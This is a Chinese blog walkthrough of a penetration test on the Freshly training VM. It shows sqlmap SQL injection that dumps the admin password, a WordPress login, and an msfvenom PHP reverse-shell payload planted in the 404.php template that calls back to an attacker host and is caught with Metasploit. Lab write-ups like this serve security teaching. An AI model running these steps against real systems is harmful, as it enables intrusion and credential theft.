网络安全从0到0.5之Freshly靶机实战渗透测试

admin 2022年3月8日14:54:56网络安全从0到0.5之Freshly靶机实战渗透测试已关闭评论102 views字数 1925阅读6分25秒阅读模式

Download: Freshly

Found

渗透靶机的第一步就是确定靶机的IP地址,只有确定了IP地址,才能进行下一步渗透。通过mac地址可判断出有可能的IP地址,再逐一进行判断。

主机发现

arp-scan 172.16.10.0/24

网络安全从0到0.5之Freshly靶机实战渗透测试

通过mac地址进行判断,发现可能的IP地址为172.16.10.150172.16.10.176,通过前面网络安全从0到0.5之Zico 2靶机实战渗透测试中对172.16.10.176IP进行的测试可以将其排除。

因此可以得到靶机IP为: 172.16.10.150

Collect

得到靶机IP后,便可以开始信息收集了。

对开放端口进行信息收集

shell
nmap -sS -p- 172.16.10.150

网络安全从0到0.5之Freshly靶机实战渗透测试

对服务版本进行信息收集。

nmap -sV 172.16.10.150

网络安全从0到0.5之Freshly靶机实战渗透测试

发现该靶机开启了804438080端口,都是WEB服务。

Attack

使用浏览器访问http://172.16.10.150:80

网络安全从0到0.5之Freshly靶机实战渗透测试

对网站进行url爆破。

dirb http://172.16.10.150

网络安全从0到0.5之Freshly靶机实战渗透测试

访问http://172.16.10.150/login.php,发现其为一个简单的登录框。

网络安全从0到0.5之Freshly靶机实战渗透测试

输入正常的账号密码进行测试,发现返回为0。

网络安全从0到0.5之Freshly靶机实战渗透测试

输入万能账号密码进行测试,发现返回为1。

网络安全从0到0.5之Freshly靶机实战渗透测试

由此可得,账号位置存在SQL注入,并且是布尔盲注,由于是靶机,直接Sqlmap 一把梭。

```

爆破数据库

sqlmap --url http://172.16.10.150/login.php --forms --batch --dbs
available databases [7]:
[] information_schema
[
] login
[] mysql
[
] performance_schema
[] phpmyadmin
[
] users
[*] wordpress8080

爆破数据表

sqlmap --url http://172.16.10.150/login.php --forms --batch -D wordpress8080 --tables
Database: wordpress8080
[1 table]
+-------+
| users |
+-------+

爆破数据

sqlmap --url http://172.16.10.150/login.php --forms --batch -D wordpress8080 -T users --dump
Database: wordpress8080
Table: users
[1 entry]
+---------------------+----------+
| password           | username |
+---------------------+----------+
| SuperSecretPassword | admin   |
+---------------------+----------+
```

最终得到用户密码。

网络安全从0到0.5之Freshly靶机实战渗透测试

那我从wordpress8080数据库得到的密码,用来登录wordpress后台过分吗,不过分!!!

登入wordpress后台 http://172.16.10.150:8080/wordpress/wp-login.php?redirect_to=http%3A%2F%2F172.16.10.150%3A8080%2Fwordpress%2Fwp-admin%2F&reauth=1,很好,登录成功!

网络安全从0到0.5之Freshly靶机实战渗透测试

GET SHELL

进入后台后,就可以准备getshell了,直接在404页面写入反弹木马。

kali生成php反弹木马

msfvenom -p php/meterpreter/reverse_tcp LHOST=172.16.10.123 LPORT=4498 -f raw

网络安全从0到0.5之Freshly靶机实战渗透测试

写入到404.php模板中

网络安全从0到0.5之Freshly靶机实战渗透测试

kali开启监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.10.123
lhost => 172.16.10.123
msf6 exploit(multi/handler) > set lport 4498
lport => 4498
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

网络安全从0到0.5之Freshly靶机实战渗透测试

*成功反弹shell*

Privilege Escalation

尝试使用前面爆破得到的admin密码进行登入。

网络安全从0到0.5之Freshly靶机实战渗透测试

成功。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月8日14:54:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   网络安全从0到0.5之Freshly靶机实战渗透测试http://cn-sec.com/archives/821895.html